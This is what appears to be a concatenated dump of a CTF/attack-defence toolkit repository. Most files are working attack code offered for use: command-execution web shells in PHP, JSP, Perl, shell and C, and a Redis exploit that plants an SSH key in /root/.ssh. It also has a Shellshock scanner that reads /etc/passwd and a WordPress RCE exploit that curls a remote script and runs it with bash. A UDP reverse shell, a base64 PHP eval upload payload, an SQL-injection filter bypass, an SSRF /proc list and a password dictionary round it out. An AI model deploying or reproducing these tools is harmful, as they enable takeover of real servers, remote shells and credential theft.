" 8 | echo "
" 9 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test 10 | lineas=`cat /tmp/test | wc -l` 11 | lineas2=`expr $lineas - 4` 12 | lineas3=`expr $lineas2 - 1` 13 | tail -$lineas2 /tmp/test > /tmp/test2 14 | head -$lineas3 /tmp/test2 > /tmp/upload 15 | echo "
" 16 | cat /tmp/upload 17 | echo "" 18 | 19 | -------------------------------------------------------------------------------- /tools/redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys,httplib 5 | import socket,sys 6 | fobj = open('redis.txt','r') 7 | fileHandle = open('vul.txt','a+') 8 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' 9 | s = socket.socket() 10 | socket.setdefaulttimeout(10) 11 | for target in fobj: 12 | ip = target.strip() 13 | try: 14 | port = 6379 15 | s.connect((ip, port)) 16 | s.send(payload) 17 | recvdata = s.recv(1024) 18 | if recvdata and 'redis_version' in recvdata: 19 | fileHandle.write(target) 20 | print 'server is vulerable' 21 | except: 22 | pass 23 | -------------------------------------------------------------------------------- /tools/runmd5.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import md5 5 | 6 | def md5x(str): 7 | m1 = md5.new() 8 | m1.update(str) 9 | return m1.hexdigest() 10 | 11 | 12 | def run(arg): 13 | code = arg[0] 14 | start = 10000000 15 | end = 100000000 16 | if len(arg) > 2: 17 | start = arg[1] 18 | if len(arg) > 3: 19 | start = arg[2] 20 | if not code: 21 | return False 22 | print 'Runing...' 23 | while start <= end: 24 | res = md5x(str(start))[:len(code)] 25 | if res == code: 26 | print start 27 | return start 28 | start += 1 29 | 30 | if __name__ == '__main__': 31 | run(['1ceac']) -------------------------------------------------------------------------------- /webshell/php/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
"; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "
";
27 | $fp = fopen($fichero, "r");
28 | $buffer = fread($fp, filesize($fichero));
29 | echo $buffer;
30 | fclose($fp);
31 | }
32 |
33 | ?>
--------------------------------------------------------------------------------
/scripts/iconv_gbk_to_utf8.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | SUBFIX="php" #需要转换的目标文件后缀
3 | if [ -z $1 ];then
4 | cd $PWD
5 | else
6 | if [ -d $1 ];then
7 | cd $1
8 | else
9 | echo " $1 is not exist;"
10 | exit 1
11 | fi
12 | fi
13 |
14 | for i in $SUBFIX;
15 | do
16 | files=`find . -name "*.$i"`
17 | for f in $files;
18 | do
19 | # type=`file $f|awk -F':' '{print $2}' |awk '{print $4}'` #获取文件类型
20 | result=$(file $f | grep "UTF-8")
21 | echo $result
22 | # echo $f
23 | if [[ "$result" != "" ]]; then
24 | # if [ $type != "UTF-8" ];then
25 | cp $f "$f_bak"
26 | iconv -f GB2312 -t UTF-8 $f #使用 iconv函数进行转换
27 | fi
28 | done
29 | done
--------------------------------------------------------------------------------
/tools/post_upload.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests
5 | import re
6 | import string
7 | import random
8 | import sys
9 |
10 | reload(sys)
11 | sys.setdefaultencoding("utf-8")
12 |
13 | req = requests.session()
14 | url = ''
15 |
16 |
17 | def upload(file_name, file_data):
18 | files = {
19 | "file": (file_name, file_data, 'application/octet-stream'),
20 | }
21 | res = req.post(url=url, files=files)
22 | if res.status_code == 200:
23 | return res.content
24 | else:
25 | return False
26 |
27 |
28 | if __name__ == '__main__':
29 | shell1 = 'paaaPD9waHAgZXZhbCgkX1BPU1RbOTk5XSk7Pz5w'
30 | res = upload(shell1)
31 | if res:
32 | print res
33 |
--------------------------------------------------------------------------------
/webshell/php/up.php:
--------------------------------------------------------------------------------
1 |
11 |
12 |
13 |
14 | 20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /tools/urllibreq.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import time 5 | import urllib 6 | import urllib2 7 | import json 8 | 9 | 10 | def post(url, values): 11 | data = urllib.urlencode(values) 12 | req = urllib2.Request(url, data) 13 | req.add_header( 14 | 'user-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0') 15 | req.add_header('cache-control', 'no-cache') 16 | req.add_header('accept', '*/*') 17 | req.add_header('connection', 'keep-alive') 18 | req.add_header('Content-Type', 'application/x-www-form-urlencoded') 19 | response = urllib2.urlopen(req) 20 | code = response.getcode() 21 | body = response.read() 22 | return code, body 23 | 24 | 25 | if __name__ == '__main__': 26 | url = 'http://' 27 | values = {'tel': 'xxx', 'type': "xxx"} 28 | code, body = post(url, values) 29 | -------------------------------------------------------------------------------- /tools/md5_collision_bin/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | url = "http://ctf.xjnu.edu.cn:9900/web80/flag_Revenge_2333333.php" 3 | b1 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' + \ 4 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' + \ 5 | '\xaf\xbf\xa2\x00\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' + \ 6 | '\x93\xd8\x49\x67\x6d\xa0\xd1\x55\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 7 | b2 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' +\ 8 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' +\ 9 | '\xaf\xbf\xa2\x02\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' +\ 10 | '\x93\xd8\x49\x67\x6d\xa0\xd1\xd5\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 11 | # data = {'param1': open("message1.bin", "rb").read(), 12 | # 'param2': open("message2.bin", "rb").read()} 13 | data = {'param1': b1, 14 | 'param2': b2} 15 | r = requests.post(url, data=data) 16 | print(r.text) 17 | -------------------------------------------------------------------------------- /tools/bash.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib2,re 3 | import urllib 4 | 5 | def bash_exp(url): 6 | regex = re.compile(r'/root:/bin/bash') 7 | header = { 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 10 | 'Accept-Encoding': 'gzip,deflate,sdch', 11 | 'Accept-Language': 'en-US,en;q=0.8', 12 | 'Connection': 'keep-alive', 13 | 'User-Agent': '() { :;}; echo `/bin/cat /etc/passwd`', 14 | 'Referer': 'http://www.google.com.hk' 15 | } 16 | request = urllib2.Request(url,headers = header) 17 | try: 18 | res = urllib2.urlopen(request) 19 | if re.findall(regex,res.read()): 20 | print u"bash: %s"%(url) 21 | else: 22 | print u"无bash漏洞: %s"%(url) 23 | res.close() 24 | except Exception: 25 | print u"访问网页超时%s"%(url) 26 | 27 | if __name__=='__main__': 28 | f = open('target.txt','r') 29 | for i in f.readlines(): 30 | bash_exp(urllib.unquote(i)) 31 | f.close() 32 | -------------------------------------------------------------------------------- /webshell/jsp/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (unix) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 | 17 |
18 | <%
19 | if (request.getParameter("cmd") != null) {
20 | out.println("Command: " + request.getParameter("cmd") + "
");
21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
22 | OutputStream os = p.getOutputStream();
23 | InputStream in = p.getInputStream();
24 | DataInputStream dis = new DataInputStream(in);
25 | String disr = dis.readLine();
26 | while ( disr != null ) {
27 | out.println(disr);
28 | disr = dis.readLine();
29 | }
30 | }
31 | %>
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/tools/php.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,httplib
5 | from optparse import OptionParser
6 | usageString = "Usage: %prog [options] hostname"
7 | parser = OptionParser(usage=usageString)
8 | (opts,args) = parser.parse_args()
9 | if len(args) < 1:
10 | parser.error("Hostname is required")
11 | print __doc__
12 | file = sys.argv[1]
13 | fobj = open(redis.txt,'r')
14 | fileHandle = open('php.txt','a+')
15 | for target in fobj:
16 | website = target.strip()
17 | #login path
18 | dirs = ["phpinfo.php","php.php","test.php","1.php"]
19 | for line in dirs:
20 | conn = httplib.HTTPConnection(website)
21 | conn.request('GET','/'+line)
22 | r1 = conn.getresponse()
23 | if r1.status == 200 or r1.status == 301 or r1.status == 403:
24 | print website+'/'+line,r1.status,r1.reason
25 | if not s.is_vul():
26 | print 'NO vulerable'
27 | #sys.exit(0)
28 | else:
29 | fileHandle.write(target)
30 | print 'server is vulerable'
31 |
--------------------------------------------------------------------------------
/tools/rexp.py:
--------------------------------------------------------------------------------
1 | import socket
2 | from os import system
3 | from sys import argv
4 | def send(conn,cmd):
5 | try:
6 | conn.send(cmd+"\n")
7 | recv=conn.recv(5)
8 | #conn.close()
9 | recv=recv.replace("\n",''),
10 | return recv
11 | except:
12 | return False
13 |
14 | def conn_redis(args):
15 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 | args=args.split(":")
17 | host=args[0]
18 | port=int(args[1])
19 | try:
20 | client.connect((host, port))
21 | return client
22 | except:
23 | return False
24 |
25 | if len(argv)!=2:
26 | print "Usage: python rexp.py 127.0.0.1:6379"
27 | exit()
28 | host=argv[1]
29 | host.split(":")
30 | port=6379
31 | if len(host)==2:
32 | port=int(host[1])
33 | conn=conn_redis("%s:%d"%(host,port))
34 | send(conn,"flushall")
35 | system("cat foo.txt| redis-cli -h %s -p %d -x set pwn"%(host,port))
36 | cmd='''CONFIG set dir /root/.ssh/
37 | config set dbfilename authorized_keys
38 | save
39 | exit'''
40 | cmd=cmd.split("\n")
41 | for c in cmd:
42 | send(conn,c)
43 |
--------------------------------------------------------------------------------
/webshell/sh/list.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #
3 | # SH_KIT
4 | #
5 | # list.sh = Directory & File Listing
6 | #
7 | # by: The Dark Raver
8 | # modified: 16/12/2005
9 | #
10 |
11 | echo Content-Type: text/html
12 | echo
13 |
14 | if [ "$QUERY_STRING" != "" ]
15 | then
16 | echo PATH: $QUERY_STRING "" 17 | echo `ls $QUERY_STRING` > /tmp/test 18 | else 19 | echo PATH: / "
" 20 | echo > /tmp/test 21 | QUERY_STRING="/" 22 | root="1" 23 | fi 24 | 25 | out=`grep "/" /tmp/test` 26 | 27 | if [ "$out" != "" ] 28 | then 29 | echo FICHERO: $QUERY_STRING 30 | echo "
" 31 | cat $QUERY_STRING 32 | else 33 | if [ "$root" != "1" ] 34 | then 35 | echo "( ) ".."30 |
" 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) "$i"
" 42 | else 43 | echo "( ) "$i"
" 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /dict/ssrf/proc.dic: -------------------------------------------------------------------------------- 1 | /proc/cmdline 2 | /proc/mounts 3 | /proc/net/arp 4 | /proc/net/fib_trie 5 | /proc/net/route 6 | /proc/net/tcp 7 | /proc/net/udp 8 | /proc/sched_debug 9 | /proc/self/fd/26 10 | /proc/self/cmdline 11 | /proc/self/cwd 12 | /proc/self/environ 13 | /proc/self/fd/0 14 | /proc/self/fd/1 15 | /proc/self/fd/10 16 | /proc/self/fd/11 17 | /proc/self/fd/12 18 | /proc/self/fd/13 19 | /proc/self/fd/14 20 | /proc/self/fd/15 21 | /proc/self/fd/16 22 | /proc/self/fd/17 23 | /proc/self/fd/18 24 | /proc/self/fd/19 25 | /proc/self/fd/2 26 | /proc/self/fd/20 27 | /proc/self/fd/21 28 | /proc/self/fd/22 29 | /proc/self/fd/23 30 | /proc/self/fd/24 31 | /proc/self/fd/25 32 | /proc/self/fd/27 33 | /proc/self/fd/28 34 | /proc/self/fd/29 35 | /proc/self/fd/3 36 | /proc/self/fd/30 37 | /proc/self/fd/31 38 | /proc/self/fd/32 39 | /proc/self/fd/33 40 | /proc/self/fd/34 41 | /proc/self/fd/35 42 | /proc/self/fd/4 43 | /proc/self/fd/5 44 | /proc/self/fd/6 45 | /proc/self/fd/7 46 | /proc/self/fd/8 47 | /proc/self/fd/9 48 | /proc/self/stat 49 | /proc/self/status 50 | /proc/verison 51 | -------------------------------------------------------------------------------- /tools/drcom/Decipher.py: -------------------------------------------------------------------------------- 1 | def Decipher(s): 2 | p = '' 3 | key = 30137 4 | for i in xrange(len(s) - 1): 5 | ch = ord(s[i]) 6 | if ch >= 32 and ch <= 126: 7 | ch -= 32 8 | offset = int(96.0 * (key * (i + 1) % 100537 / 100537.0)) 9 | ch = (ch - offset) % 95 10 | if ch < 0: 11 | ch += 95 12 | ch += 32 13 | p += chr(ch) 14 | return p 15 | 16 | 17 | def save(fff, txt): 18 | f = open(fff, 'a') 19 | for i in txt: 20 | f.write(i) 21 | f.close() 22 | 23 | 24 | def fuck(): 25 | ll = [] 26 | f = open('x.txt') 27 | x = 1 28 | try: 29 | c = f.readlines() 30 | for i in c: 31 | i = i[1:-2].replace("\",\"", "####") 32 | t = i.split("####") 33 | ll.append(t[0] + "," + Decipher(t[1]) + "," + t[2] + ",\n") 34 | except: 35 | pass 36 | finally: 37 | save(ll) 38 | f.close() 39 | 40 | if __name__ == '__main__': 41 | # fuck('pwd.txt') 42 | print Decipher('''Sr'J`%a''') 43 | -------------------------------------------------------------------------------- /tools/ip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding=utf-8 3 | 4 | import optparse,re,sys,os 5 | 6 | def getip(_txt): 7 | result = [] 8 | f = open(_txt,"r") 9 | line = f.read() 10 | result = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) 11 | result = {}.fromkeys(result).keys() 12 | return result 13 | 14 | def ping(hosts): 15 | ipss = [] 16 | for i in hosts: 17 | ret = os.system("ping -c 1 -t 1 %s > nop" % i) 18 | #ret = os.system("ping -n 1 -w 1 %s > nop" % i) 19 | if not ret: 20 | ipss.append(i) 21 | return ipss 22 | 23 | 24 | if __name__ == '__main__': 25 | txt = [] 26 | parser = optparse.OptionParser('usage: %prog [options] target') 27 | parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. default = 20') 28 | parser.add_option('-f', '--file', dest='names_file',default='false', type='string',help='files default = false') 29 | (options, args) = parser.parse_args() 30 | 31 | if str(options.names_file) == "false": 32 | if len(args) < 1 : 33 | parser.print_help() 34 | sys.exit(0) 35 | txt = ping(getip(str(options.names_file))) 36 | print txt 37 | -------------------------------------------------------------------------------- /tools/google.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | __author__ = 'DM_' 3 | import simplejson,random 4 | import requests as req 5 | 6 | page = 1 7 | status = 200 8 | dock = str(raw_input('请输入google关键字:')) #这里是google关键词. 9 | while status == 200: 10 | headers = { 11 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 12 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 13 | 'Accept-Encoding': 'gzip,deflate,sdch', 14 | 'Accept-Language': 'en-US,en;q=0.8', 15 | 'Connection': 'keep-alive', 16 | 'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', 17 | 'Referer': 'http://www.baidu.com/' 18 | } 19 | 20 | url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s"%(dock,page) 21 | try: 22 | HtmlContent = req.get(url, timeout=30, headers=headers).text 23 | result = simplejson.loads(HtmlContent) 24 | status = result['responseStatus'] 25 | 26 | print "第%d页的数据:" % page 27 | try: 28 | Urls = result['responseData']['results'] 29 | for url in Urls: 30 | print url['url'] 31 | except: 32 | print '当前页面获取失败.' 33 | print result['responseDetails'] 34 | page += 1 35 | except: 36 | print "Time Out or site is not open." 37 | print "一共有%d页的数据" % (page-2) 38 | -------------------------------------------------------------------------------- /webshell/pl-cgi/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
';
31 |
32 | if(defined $FORM{'cmd'}) {
33 | print "Results of '$cmd' execution:\n\n";
34 | print "-"x80;
35 | print "\n";
36 |
37 | open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 |
39 | while() {
40 | print;
41 | }
42 |
43 | close(CMD);
44 | print "-"x80;
45 | print "\n";
46 | }
47 |
48 | print " ";
49 |
50 | sub parse_parameters ($) {
51 | my %ret;
52 |
53 | my $input = shift;
54 |
55 | foreach my $pair (split('&', $input)) {
56 | my ($var, $value) = split('=', $pair, 2);
57 |
58 | if($var) {
59 | $value =~ s/\+/ /g ;
60 | $value =~ s/%(..)/pack('c',hex($1))/eg;
61 |
62 | $ret{$var} = $value;
63 | }
64 | }
65 |
66 | return %ret;
67 | }
68 |
--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * CmdServlet.java 20/01/2004
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class CmdServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 |
18 | PrintWriter out = res.getWriter();
19 | out.print("");
20 | out.print(""); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n
Command: " + req.getParameter("cmd") + "\n
\n");
27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | int c='\0';
30 | while ((c=procIn.read()) != -1) {
31 | out.print((char)c);
32 | }
33 | }
34 |
35 | out.print("\n
");
36 | out.print("");
37 | }
38 |
39 | public String getServletInfo() {
40 | return "CmdServlet 0.1";
41 | }
42 |
43 | }
44 |
--------------------------------------------------------------------------------
/webshell/servlet/CmdServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * CmdServlet.java 20/01/2004
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
13 | public class CmdServlet extends HttpServlet {
14 |
15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | res.setContentType("text/html");
17 |
18 | PrintWriter out = res.getWriter();
19 | out.print("");
20 | out.print(""); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n
Command: " + req.getParameter("cmd") + "\n
\n");
27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | int c='\0';
30 | while ((c=procIn.read()) != -1) {
31 | out.print((char)c);
32 | }
33 | }
34 |
35 | out.print("\n
");
36 | out.print("");
37 | }
38 |
39 | public String getServletInfo() {
40 | return "CmdServlet 0.1";
41 | }
42 |
43 | }
44 |
--------------------------------------------------------------------------------
/awd/wordpress_exp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests
3 | import sys
4 |
5 | # wordpress's url
6 | target = 'http://127.0.0.1' if not sys.argv[1] else sys.argv[1]
7 | # Put your command in a website, and use the website's url
8 | # don't contains "http://", must be all lowercase
9 | shell_url = 'example.com/1.txt' if not sys.argv[2] else sys.argv[2]
10 | # an exists user
11 | user = 'admin'
12 |
13 | def generate_command(command):
14 | command = '${run{%s}}' % command
15 | command = command.replace('/', '${substr{0}{1}{$spool_directory}}')
16 | command = command.replace(' ', '${substr{10}{1}{$tod_log}}')
17 | return 'target(any -froot@localhost -be %s null)' % command
18 |
19 |
20 | data = {
21 | 'user_login': user,
22 | 'redirect_to': '',
23 | 'wp-submit': 'Get New Password'
24 | }
25 | headers = {
26 | 'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
27 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
28 | }
29 | proxies = {
30 | 'http': 'http://127.0.0.1:8080'
31 | }
32 | target += '/wp-login.php?action=lostpassword'
33 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
34 | headers['Host'] = generate_command('/bin/bash /tmp/rce')
35 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
--------------------------------------------------------------------------------
/dict/password/adobe100.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 123456789
3 | password
4 | adobe123
5 | 12345678
6 | qwerty
7 | 1234567
8 | 111111
9 | photoshop
10 | 123123
11 | 1234567890
12 | 000000
13 | abc123
14 | 1234
15 | adobe1
16 | macromedia
17 | azerty
18 | iloveyou
19 | aaaaaa
20 | 654321
21 | 12345
22 | 666666
23 | sunshine
24 | 123321
25 | letmein
26 | monkey
27 | asdfgh
28 | password1
29 | shadow
30 | princess
31 | dragon
32 | adobeadobe
33 | daniel
34 | computer
35 | michael
36 | 121212
37 | charlie
38 | master
39 | superman
40 | qwertyuiop
41 | 112233
42 | asdfasdf
43 | jessica
44 | 1q2w3e4r
45 | welcome
46 | 1qaz2wsx
47 | 987654321
48 | fdsa
49 | 753951
50 | chocolate
51 | fuckyou
52 | soccer
53 | tigger
54 | asdasd
55 | thomas
56 | asdfghjkl
57 | internet
58 | michelle
59 | football
60 | 123qwe
61 | zxcvbnm
62 | dreamweaver
63 | 7777777
64 | maggie
65 | qazwsx
66 | baseball
67 | jennifer
68 | jordan
69 | abcd1234
70 | trustno1
71 | buster
72 | 555555
73 | liverpool
74 | abc
75 | whatever
76 | 11111111
77 | 102030
78 | 123123123
79 | andrea
80 | pepper
81 | nicole
82 | killer
83 | abcdef
84 | hannah
85 | test
86 | alexander
87 | andrew
88 | 222222
89 | joshua
90 | freedom
91 | samsung
92 | asdfghj
93 | purple
94 | ginger
95 | 123654
96 | matrix
97 | secret
98 | summer
99 | 1q2w3e
100 | snoopy1
101 |
--------------------------------------------------------------------------------
/other/test.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | #
3 | import requests
4 | import urllib
5 | import hashlib
6 | import bs4
7 |
8 | req = requests.get("http://106.75.67.214:2250")
9 | _cookies = req.cookies
10 | text = req.headers['Ciphertext']
11 | print text
12 |
13 | content = req.content
14 | bsobj = bs4.BeautifulSoup(content, "html.parser")
15 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[
16 | 2].split("+")[1].split(")")[0]
17 | print part
18 |
19 | for i in range(100, 999):
20 | dest = str(i)+part
21 | if hashlib.sha1(dest).hexdigest() == text:
22 | data = {"pass": i}
23 | req = requests.post(
24 | "http://106.75.67.214:2250", data=data, cookies=_cookies)
25 | print req.content
26 |
27 | bsobj = bs4.BeautifulSoup(req.content, "html.parser")
28 | print bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[2]
29 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[
30 | 2].split(u"\uff1a")[1]
31 |
32 | result = eval(part)
33 |
34 | data = {"pass": result}
35 | req = requests.post(
36 | "http://106.75.67.214:2250", data=data, cookies=_cookies)
37 | print req.content # flag{f325c62b-9505-4c13-ad4b-010bddb23c68}
38 |
39 | break
40 |
41 | else:
42 | continue
43 |
--------------------------------------------------------------------------------
/scripts/shell_53_udp.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf-8 -*-
2 | #!/usr/bin/env python
3 | """
4 | back connect py version,only linux have pty module
5 | code by google security team
6 | UDP by anthrax@insight-labs.org
7 | """
8 | import sys,os,socket,pty
9 | shell = "/bin/sh"
10 | def usage(name):
11 | print 'python reverse connector'
12 | print 'usage: %s "); 61 | } else { 62 | //printf("QUERY_STRING: %s\n", cmd); 63 | cmd+=4; 64 | cmd=uri_decode(cmd); 65 | printf("
COMMAND: %s
\n", cmd);
66 | fflush(stdout);
67 | execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 | }
69 |
70 | }
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/tools/sqlin.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests
5 | import re
6 | import string
7 | import random
8 | import sys
9 |
10 | reload(sys)
11 | sys.setdefaultencoding("utf-8")
12 |
13 | req = requests.session()
14 |
15 |
16 | def post(url, data, headers):
17 | res = req.post(url=url, data=data, headers=headers)
18 | if res.status_code == 200:
19 | return res.content
20 | else:
21 | return False
22 |
23 |
24 | def get(url, headers):
25 | res = req.get(url=url, headers=headers)
26 | if res.status_code == 200:
27 | return res.content
28 | else:
29 | return False
30 |
31 |
32 | def get_1(url, headers):
33 | res = req.get(url=url, headers=headers)
34 | if res.status_code == 200:
35 | return res.content
36 | else:
37 | return False
38 |
39 |
40 | def get_2(url, headers):
41 | res = req.get(url=url, headers=headers)
42 | if res.status_code == 200:
43 | return res.content
44 | else:
45 | return False
46 |
47 | if __name__ == '__main__':
48 | url = 'http://202.120.7.203/index.php?id='
49 | # # & 0 1 2 3 4 5 6 7 8 9 @
50 |
51 | headers = {}
52 |
53 | sql = "-1 union sel\x00ect 1,(sel\x00ect+flag+fro\x00m+flag),3"
54 | print get(url + sql, headers)
55 | #
56 | #
57 | #
58 | #
59 | # flag{W4f_bY_paSS_f0R_CI}
60 | #
61 | #
62 |
63 | # flag{W4f_bY_paSS_f0R_CI}
64 | #
65 | # 3
66 | #
67 |
68 | #
69 | #
70 |
--------------------------------------------------------------------------------
/wrapper/wrapper_pipe.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUFSIZE 1000
7 |
8 | char *buf;
9 |
10 | void quit()
11 | {
12 | exit(0);
13 | }
14 |
15 | void timeout()
16 | {
17 | printf("Times Up!\n");
18 | fflush(stdout);
19 | exit(0);
20 | }
21 |
22 | int main(int argc, char *argv[])
23 | {
24 | int p1[2];
25 | int p2[2];
26 | int pid;
27 |
28 | buf = (char*) malloc(BUFSIZE);
29 | int n;
30 |
31 | if( argc < 2 ){
32 | fprintf(stderr, "There is no argv\n");
33 | exit(0);
34 | }
35 |
36 | char exe[50];
37 | sprintf(exe,"./%s",argv[1]);
38 |
39 | fprintf(stdout, "pwn: %s\n",exe);
40 |
41 | pipe(p1);
42 | pipe(p2);
43 | pid = fork();
44 |
45 | if (pid){ //parent
46 | signal(SIGCHLD, quit);
47 | signal(SIGALRM, timeout);
48 | alarm(10);
49 |
50 | close(p1[0]);
51 | close(p2[1]);
52 |
53 | // get
54 | n = read(p2[0], buf, BUFSIZE);
55 | write(1, buf, n);
56 |
57 | while (1) {
58 | // hijack input
59 | n = read(0, buf, BUFSIZE);
60 | if (strstr(buf, "flag")) { // filter
61 | fprintf(stderr, "pwn?\n");
62 | exit(0);
63 | }
64 |
65 | write(p1[1], buf, n);
66 | bzero(buf, BUFSIZE);
67 |
68 | // hijack output
69 | n = read(p2[0], buf, BUFSIZE);
70 | write(1, buf, n);
71 | }
72 |
73 | } else { //child
74 | close(p1[1]);
75 | close(p2[0]);
76 | dup2(p1[0], 0);
77 | dup2(p2[1], 1);
78 | execve(exe, NULL, NULL);
79 | }
80 |
81 | return 0;
82 | }
83 |
--------------------------------------------------------------------------------
/tools/portscan.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
4 | from socket import *
5 |
6 | __info__ = {
7 | "desc": "A script for scan port",
8 | "version": "1.0",
9 | "usage": "ip port[,more] [timeout]"
10 | }
11 |
12 | status = {
13 | 0: "open",
14 | 10049: "address not available",
15 | 10061: "closed",
16 | 10060: "timeout",
17 | 10056: "already connected",
18 | 10035: "filtered",
19 | 11001: "IP not found",
20 | 10013: "permission denied"
21 | }
22 |
23 | PORT_TABLE = {
24 | 21: "FTP",
25 | 22: "SSH",
26 | 23: "Telent",
27 | 80: "HTTP",
28 | 443: "HTTPS",
29 | 1521: "Oracle Server",
30 | 3306: "MySQL Server",
31 | 3389: "RDP"
32 | }
33 |
34 |
35 | def scan(ip, port, timeout):
36 | s = socket(AF_INET, SOCK_STREAM)
37 | s.settimeout(timeout)
38 | try:
39 | result = s.connect_ex((ip, port))
40 | except:
41 | print "Cannot connect to IP"
42 | return
43 | s.close()
44 | if result in status.keys():
45 | return str(port) + " : " + PORT_TABLE[port] + " : " + status[result]
46 | else:
